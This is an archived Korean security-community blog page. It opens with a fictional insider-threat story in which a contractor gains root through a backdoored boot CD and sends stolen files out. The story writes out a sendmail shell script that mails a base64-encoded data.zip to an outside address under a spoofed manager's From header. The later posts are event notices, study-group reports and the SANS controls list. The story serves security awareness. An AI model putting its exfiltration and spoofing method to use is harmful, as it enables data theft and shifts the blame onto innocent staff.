2013년 10월 30일 수요일

가상 시나리오: 3rd-Party 엔지니어에 의한 정보 유출

안녕하세요. SecurityPlus입니다.
해커는 특별한 사람들일까요?
그 질문에 대해 여기 특별히 구성된 이야기로 그 대답을 대신하려고 합니다...^^

에피소드 1. 폭풍 전야

난 XX 고객사를 지원하는 작은 회사의 엔지니어다.
벌써 한 달째...
매일 야근에 돌아오는 것은 XX 고객사 염부장의 욕설과 비아냥 뿐....
젠장....이젠 조금씩 지쳐 간다...
그래도 한 달 동안 삽질하고 있는 CIA2009 서버는 이 회사의 매우 중요한 정보를
다루는 서버라는 것을 알았다.
염부장을 엿먹게 하고 싶은 생각에 남몰래 시스템 Root에서 rm -rf * 를 치는 상상을
종종 하곤 한다.
하지만, 그보다 더 통쾌하게 복수할 수 있는 계획을 세웠다.
그것은 바로 그 중요 정보를 경쟁사에 팔아 넘기는 거다.
나의 고생의 대가로 그 정도는 보상을 받아야 하지 않을까.....
이미 경쟁사 김 이사와 정보에 대한 구매 가격과 전달 방법도 약속해 놓은 터다.
두고 봐라, 염 부장....즐거울꺼다...ㅋㅋ
내일이 기다려진다....


에피소드 2. 닫혀진 봉인을 풀다.

현재 시각 저녁 7시 40분. 염부장 호출이다.
패치 작업이 필요하다고 메일 줬더니, 당장 오늘 저녁 8시까지 들어오란다...젠장.
xx 고객사 정문, 이곳은 출입통제가 꽤 엄격하다.
USB 메모리 스틱, 외장 하드디스크, MP3 등 이동식 저장 매체는 모두 반입 금지다.
더구나, 노트북의 USB 포트와 CD-ROM은 모두 보안 스티커를 붙이고,
카메라폰의 카메라 렌즈 부분도 역시 보안 스티커 신세다....ㅋㅋ
매일 그렇듯, 오늘도 갖고 있던 것들을 모두 맡겨 놓고, 스티커로 도배한 다음,
터덜터덜 염부장을 만나러 갔다.
어, 왔어? 참, 내가 얘기 안 했던가? 오늘 패치 작업은 새벽 2시부터야...
아뭏튼 왔으니깐, 그때까지 대기....불만 없지?
...(_ _)a;;;
아...네....................18....
새벽 2시.
패치 작업에는 Root 권한이 필요하다. 그래서, 염부장이 Telnet 창 하나 열어 주면,
거기서 작업하는 것이 보통이다. 그래서, 난 CIA2009 서버에 계정도 없고,
Root 패스워드도 모른다. 하지만, 난 거기에 어떤 정보가 어디에 있는진 안다.
이 닫혀진 보물상자를 어떻게 열 수 있을까.....
저, 염부장님......
와??
패치할 코드도 크고, FTP도 느린데, 서버실에서 CD로 올리면 안 될까요?
그래? 하흠.....뭐, 제품까냐? 뭔 패치가 그렇게 커? 아뭏튼 나도 빨리 가야 하니깐,
그렇게 하지.
서버실.
염부장은 졸린지 연신 하품이다.
CD를 넣고, 패치를 했다.
저, 염부장님, 패치는 끝났는데요. 이제 서버 부팅하고, 구성 좀만 손 보면 끝납니다.
그래? 하흠....이 서버 부팅할려면 꽤 걸리는데....난 올라가서 쉬고 있을 테니깐,
서버 올라오면 알려 줘.
염부장이 직접 shutdown -rF now 명령 날리고는 나가버렸다.
큰 서버의 굉음만이 내 곁을 지키고 있다.
하지만, 염부장도, 어느 누구도 내가 보물상자의 열쇠를 CD에 담아 넣어 두었으리라
고는 아무도 상상하지 못했을 꺼다.
(넣은 CD는 특수한 백도어를 넣은 부팅 CD....ㅋㅋ )
그 다음 이야기는 아래 동영상을 통해 직접 확인하길....^^


난 이제 root 다.
내가 가져가야 할 정보가 있는 곳으로 가서 해당 파일들을 data.zip으로 묶었다.
이제 이걸 어떻게 담아가지?
노트북으로 작업하는 거면, 방법은 있다.
"블루투스". 그렇다. 블루투스를 통해 핸드폰에 저장하면 된다.
하지만, 여긴 서버실이고, 난 콘솔을 통해 작업하고 있다.
외부의 공개된 FTP를 사용하면 되지만, 정책상 외부로 나가는 FTP는 차단되어 있다.
어떻게 하면 이 자료들을 갖고 갈 수 있지?
이 비밀은 그리 어렵지 않다....^^

에피소드 3. 염부장 고마워.

난, 모든 서비스 중 유일하게 외부로 오픈되어 있는 서비스를 안다.
물론, 직접 외부로 나갈 순 없더라도 반드시 나갈 수 있게 구성되어 있는 특수한 네트워크 서비스...^^
뭔지 알아?
그건, 바로 SMTP....ㅋㅋ 
그렇다. 메일 서비스다.
난, 어떤 서버건 무조건 기본으로 깔려 있고, 서비스되고 있는 sendmail을 사용하기로 했다.

local:/ # vi mailsender.sh
#!/bin/sh
echo "Starting to send e-mail to SecurityPlus..."

echo "From: yum.bujang@victim.com" > tmpmail
echo "To: securityplus@securityplus.or.kr" >> tmpmail
echo "Subject: Confidential Data" >> tmpmail
echo "Mime-Version: 1.0" >> tmpmail
echo "Content-Type: multipart/mixed; boundary=\"DMW.Boundary.605592468\"" >> tmpmail
echo "" >> tmpmail
echo "--DMW.Boundary.605592468" >> tmpmail
echo "Content-Type: application/x-zip-compressed" >> tmpmail
echo "Content-Transfer-Encoding: base64" >> tmpmail
echo "Content-Disposition: attachment; filename=\"data.zip\"" >> tmpmail
echo "" >> tmpmail
./base64.pl -e data.zip >> tmpmail
echo "" >> tmpmail
echo "--DMW.Boundary.605592468" >> tmpmail
/usr/sbin/sendmail -t < ./tmpmail

echo "Finished Sending SecurityPlus e-mail..."
local:/ #  ./mailsender.sh
Starting to send e-mail to SecurityPlus...
Finished Sending SecurityPlus e-mail...

local:/ # shutdown -rF now

테스트 해 볼 생각 있다면, To: 의 주소는 바꿔 주길 바란다...ㅋㅋ  내 메일 주소로 올 테니....
염부장이 메일을 보낸 것처럼 꾸며서 내 메일 주소로 보냈다.
물론, 내 메일 주소는 데이터를 받는 즉시 메일 서비스 업체에 가입 탈퇴를 해서 내 흔적을 지울 것이다.

어쨋든, 난, 내 CD를 빼고, 다시 재부팅을 했다.

한참 후에 로그인 창이 떴다.
염부장에게 전화를 했다.

뚜....뚜......뚜...... 이 자식 전화를 안 받는다.
자리에서 졸고 있음이 틀림없다.

다시 전화를 했다...그리고 몇 차례.....

어....올라왔어? 알았어....

조금 뒤에 염부장이 내려왔다.
그리고, Root 로그인을 해 줬다.
남은 작업을 마무리 하고 난 집으로 돌아와 내 메일을 확인해 보았다.


염부장 고마워....ㅋㅋ

누가 조사를 하더라도 결국, root 를 알고 있는 것도 염부장이고 메일을 보낸 이도 염부장이다....^^

난, 내일도 염부장의 구박을 받으며 일할 것이다.
경쟁사로부터 입금을 받고, 사건이 한 동안 조용할 때까지....ㅋㅋ


* 지금까지 가상 시나리오였습니다. 설마 저의 고해성사가 아니냐고 착각하는 건 아니겠죠...^^a;;;; 
   하지만, 과연 보안 전문가로써, 이러한 사건을 막으려면 각 단계별로 어떤 방안이 있을까요?
   여러가지로 한 번 생각해 보시기 바랍니다.

그럼, 안녕히 계세요.

2013년 10월 28일 월요일

SecurityPlus 9월 - 11월 중간 활동 보고

안녕하세요. SecurityPlus의 박형근입니다.

SecurityPlus 기부 및 후원을 통해 아래와 같이 활발히 SUA 세미나 및 스터디 그룹이 운영되고 있음을 알려 드립니다.

소중하신 뜻을 모아, 헛되이 사용되지 않도록 엄격히 관리되고 있으며, 후원금 이외에도 도서, 세미나 장소, 유료 세미나/컨퍼런스의 무료 티켓 및 강의 등을 통한 재능 기부와 지식 나눔도 받고 있습니다.

언제든지 나눔의 뜻 있다면 helpdesk@securityplus.or.kr 로 문의 주시기 바랍니다.

감사합니다.

=========================================

1. 예정된 SUA 스터디 그룹 일정

[11월 21일] SUA 리버싱 그룹 특강: PDF 구조 및 악성코드 분석

[11월 6일] SUA 특강. 전자금융 보안 위협과 보안 현황

[11월 1일] SUA 리버싱 그룹 오프라인 스터디

[11월 Soon] SUA 웹 해킹 그룹 오프라인 스터디

[10월 29일] SUA ISMS 오프라인 스터디
- ISO/IEC 27002 살펴보기 계속
- ISO/IEC 27005 살펴보기
- 취약 희망 기업 신입 채용 조건 검토

[10월 28일] IBM X-Force 2013 Mid-year Trend and Risk Report 기반 Global 보안 동향 웨비나

2. 완료된 SUA 스터디 그룹 일정 (관련 내용은 각 스터디 그룹 혹은 SUA 게시판에서 확인할 수 있습니다.

[10월 1일] SUA Web Hacking Study Group 1차 모임
- OWASP Broken Web App 기반 웹 보안 학습 및 실습

[10월 5일] SUA 제1회 정보보안 컨퍼런스 개최

[10월 8일] SUA ISMS Study Group 2차 모임
- ISO27002/27001 통제 항목 학습
- 보안 경제학 3장

[10월 14일] ISMS 연구회 세미나
- 개인정보보호법 연구

[9월 26일] SUA Reversing Study Group Pre-Meeting
- 리버스 엔지니어링 개요
- 리버스 엔지니어링에 대한 직업 전망

[9월 24일] SUA ISMS Study Group 1차 모임 완료
- 보안의 정의, 보안 피라미드 공부
- 보안 경제학 2장 검토: 위협과 취약점 구별

[9월 16일] ISMS연구회 세미나
- KISA K-ISMS 인증 소개 및 Q&A

* SUA 보안 스터디를 위한 도서 배부 10권
* CONCERT Conference 10석 무료 티켓 배부

* 기부 및 후원을 위한 SecurityPlus 입금 계좌번호:

한국씨티은행 175-25842-263
예금주: 박형근

참고: 입금 시 보내시는 분의 통장에는 박형근이 아니라,
박형근(SecurityPlus)라고 기재되게 됩니다.

아직 비영리 법인이 아니라서 소득 공제나 절세는 안 되지만,
SecurityPlus 활동을 지지한다면, 개인과 기업 모두 기부 및
후원 부탁드립니다.

* SecurityPlus 및 관련 모든 문의 연락처:

사무국 e-Mail: helpdesk@securityplus.or.kr

2013년 10월 25일 금요일

IBM X-Force 2013 Mid-Year Trend and Risk Report 기반 Global 보안 동향 웨비나 안내

IBM X-Force 2013 Mid-Year Trend and Risk Report 기반 Global 보안 동향 웨비나 안내

* 시간: 2013년 10월 28일 오후 8시부터
* 권장 브라우저: 파이어폭스 혹은 크롬
* 웨비나 접속 정보: https://www.ibm.com/collaboration/meeting/join?schedid=6720053

11월 19일, (ISC)2® CCFPSM Clinic - Certified Forensics Professional (CCFP℠)의 CBK®를 바탕으로 준비한 두시간 무료 프로그램에 여러분을 초대합니다.


English Version
(ISC)2® CCFPSM Clinic
2013년 11월19일, 코엑스 3층 Hall E1

(ISC)²는 Certified Forensics Professional (CCFP℠)의 CBK®를 바탕으로   
준비한 두시간 무료 프로그램에 여러분을 초대합니다.
(ISC)² 포렌식 주제 전문가 (Subject Matter Experts-SMEs)가 진행하게 될,
본 CCFP 클리닉은 포렌식 전문가들에게 자격증과 도메인에 관한 이해,
자격증 취득을 통한 커리어 혜택, 그리고 전반적인 자격 취득 과정 등,
지원자들에게 CCFP자격증 취득의 목표에 한 발 다가설 수 있는 다양한
정보를 제공할 예정입니다.


날짜: 2013년 11월19일 (화요일)
시간: 14:00 - 16:00 (등록시작 13:00)
장소: 코엑스, 3층, Hall E1
서울시 강남구 삼성동 159
참가비: 무료

Agenda
13:00 - 14:00
등록
14:00 - 14:10
인사말
이 재 우, Fellow of (ISC)², CCFP-KR, CISA, CISM
(ISC)² 아시아 자문위원회 공동 회장
동국대학교 국제정보대학원 석좌교수
사이버 포렌식 협회 회장
14:10 - 14:30
2013 국제 정보보안 업계 연구
(Global Information Security Workforce Study-GISWS)
W. Hord Tipton, CISSP-ISSEP, CAP, CISA, CNSS
(ISC)² 대표이사
전 미국 내무부 CIO
14:30 - 15:00
국제 포렌식의 흐름과 동향
 
Ir. Dr. K.P. Chow, CCFP-US 
정보보안과 암호학 센터장

홍콩대학교 교수
15:00 - 15:45
(ISC)² CCFP-KR 소개 및 도메인 개요
 
이 정 남, CCFP-KR
사이버 포렌식 협회 부회장
동국대학교 국제정보대학원 교수
15:45 - 16:00
CCFP 자격증 취득 방법과 질의/응답
박 선 영, (ISC)² 아시아 태평양
Member and Customer Services Supervisor


좌석 한정

본 행사는 무료이며, 참가 등록 마감일은 2013년 11월18일 입니다.

궁금한 사항이 있으실 경우, Ms. Crystal Cheng에게 연락부탁드립니다.

2013년 10월 17일 목요일

보안 가장 최후의 보루라고 하는 암호는 기본적으로 깨진다는 것을 전제로 설계된다.

보안 가장 최후의 보루라고 하는 암호는 기본적으로 깨진다는 것을 전제로 설계된다. 
즉, 어느 시간 동안 데이터 보호를 달성하는데 필요한 충분한 시간을 벌어준다면 암호의 역할은 충분한 것이다. 보호해야 할 시간 목표, RTO(Recovery Time Objective)를 달성하는 것이 중요한 것이지 암호가 깨지나 깨지지 않느냐는 중요한 것이 아니다. 
물론 RTO를 보장하는 암호가 그 시간을 보장하지 못했다면 이슈가 되지만, RTO 자체를 설정하지 않았는데 암호가 깨진다는 것은 이슈가 아니다.
그렇기 때문에, 암호를 적용할 때에는 RTO를 설정하고, 암호 수준이 RTO을 지킬 수 있는지, 만일 그 시간에 있어 암호의 키 길이만으로 충분치 않다면, Master Key Group을 사용해서, 암호화 키를 지속적으로 변경시키는 등의 암호화 키 관리 정책과 프로세스 도입이 암호에 있어서의 기본이다.

2013 Forrester Mobile Security Predictions, Mar 26, 2013.

https://docs.google.com/file/d/0B2xpNiJ4QrsyNGVYOTFjTFNQNnc/edit?pli=1

2013년 10월 10일 목요일

SANS, 효과적인 사이버 방어를 위한 20개 핵심 통제항목 한글 번역본

SANS, 효과적인 사이버 방어를 위한 20개 핵심 통제항목 한글 번역본

http://www.itlkorea.kr/technote/download.php?no=1358&atNo=1

해킹을 줄이고, 복구 노력 및 관련 비용을 절감하기 위해 중요 IT 인프라에 대해 연속적인 자동화된 보호 및 모니터링을 통해 조직의 보안 태세를 강화하여 핵심 자산과 인프라 및 정보를 보호하는 데 필수적인 20개 핵심 보안통제 문서를 공개합니다. 조직의 사이버 보안 구축 시 많은 활용바랍니다.

아래는 핵심 보안 통제항목 20개 입니다.

핵심 통제 1: 인가 및 비인가 기기 자산 목록 관리
핵심 통제 2: 인가 및 비인가 소프트웨어 자산 목록 관리
핵심 통제 3: 하드웨어 및 소프트웨어 보안환경 설정
핵심 통제 4: 취약점 평가 및 패치 연속성 유지
핵심 통제 5: 악성코드 방어
핵심 통제 6: 애플리케이션 소프트웨어 보안
핵심 통제 7: 무선 기기 통제
핵심 통제 8: 데이터 복구 기능
핵심 통제 9: 기술 격차 해소를 위한 보안기술 수준평가 및 교육훈련
핵심 통제 10: 네트워크 장비 보안환경 설정
핵심 통제 11: 네트워크 포트, 프로토콜 및 서비스 제한 및 통제
핵심 통제 12: 관리자 권한 사용 통제
핵심 통제 13: 네트워크 경계선 방어
핵심 통제 14: 감사 로그 기록, 모니터링 및 분석
핵심 통제 15: 수준별 접근 통제
핵심 통제 16: 계정 모니터링 및 통제
핵심 통제 17: 데이터 손실 방지
핵심 통제 18: 사고 대응 및 관리
핵심 통제 19: 네트워크 보안 설계
핵심 통제 20: 침투 시험 및 가상 훈련

본 문서는 시큐리티플러스(SecurityPlus) 및 S.U.A(SecurityPlus Union Academy) 아래의 회원들이 번역에 참여하였습니다. 번역에 참여하신 모든 분들께 깊은 감사의 말씀을 드립니다.

### 번역참여자 명단 ###

김현승, CISSP/CISA, 한국기술비젼 대표
남선미, CISSP/CISA/CEH/CPPG, KTDS
박선아, 정보처리기사, 서울여대 정보보호학과 정보보호동아리SWING 18기
박송이, 서울여대 정보보호학과 정보보호동아리SWING 20기
박형근, CISSP/CISA/CGEIT, 한국IBM
서지원, 서울여대 정보보호학과 정보보호동아리SWING 20기 부기장
장윤서, 서울여대 정보보호학과 정보보호동아리SWING 21기
전영재, CEH/CISSP/CPPG/SIS/G-ISMS/BS10012/정보통신특급감리원, (주)넷키이티아이
정홍순, 한국인터넷진흥원
제정주, 정보처리기사, 서울여대 정보보호학과 정보보호동아리SWING 18기 기장
최만균, CISSP/Security+, 파이오링크
최은영, 서울여대 정보보호학과 정보보호동아리SWING 19기 기장(현 SWING회장)

2013년 10월 7일 월요일

SecurityPlus와 S.U.A의 대학생 홍보대사 모집

안녕하세요. SecurityPlus의 박형근입니다.

SecurityPlus와 S.U.A의 대학생 홍보대사를 모집합니다.
용모 단정하고, 호감형인 현재 대학생으로 재학 중인
선남, 선녀 중 SecurityPlus와 S.U.A의 홍보대사로써
열정적으로 보안과 SecurityPlus/S.U.A의 홍보에 적극 참여할 분께서는
성명, 연락처, 이메일 주소, 프로필 사진을
helpdesk@securityplus.or.kr 로 보내 주시기 바랍니다.
많은 대학생 여러분들의 적극적인 관심과 참여 기대하겠습니다.

정보보호 관련 기업에 종사 중인 사원/대리급 보안인을 대상으로 한
홍보대사 모집도 계속되고 있습니다. 





감사합니다. ^^

2013년 10월 6일 일요일

SecurityPlus의 홍보대사를 모집합니다!

안녕하세요. SecurityPlus의 박형근입니다.
SecurityPlus의 홍보대사를 모집합니다.
용모 단정하고, 호감형인 현재 대리 및 신입 사원으로 재직 중인
선남, 선녀 중 SecurityPlus의 홍보대사로써
열정적으로 보안과 SecurityPlus의 홍보에 적극 참여할 분께서는
성명, 연락처, 이메일 주소, 프로필 사진을
helpdesk@securityplus.or.kr 로 보내 주시기 바랍니다.
많은 선남, 선녀분들의 적극적인 관심과 참여 기대하겠습니다.
감사합니다. ^^

2013년 10월 4일 금요일

사진 혹은 컴퓨터 그래픽 관련 재능 기부하실 분 찾습니다.

안녕하세요. SecurityPlus의 박형근입니다.

프로필 혹은 야외 인물 사진 등과 같이 아마추어라도
전문가 같이 잘 찍으시는 분과,

컴퓨터 그래픽 관련 재능을 가지신 분들 중에,

재능 기부를 통해
정보 보안과 안전한 인터넷을 만들기 위한 다양한 활동에
함께 참여하고자 하는 뜻있는 분들께서는

재능 기부 분야(사진, 그래픽)와 성함, 핸드폰 번호,
연락 가능한 이메일 주소를 helpdesk@securityplus.or.kr
로 보내 주시면 함께 다양한 활동에 참여하실 수 있습니다.

그럼, 많은 분들과 관심과 참여 바랍니다.

감사합니다.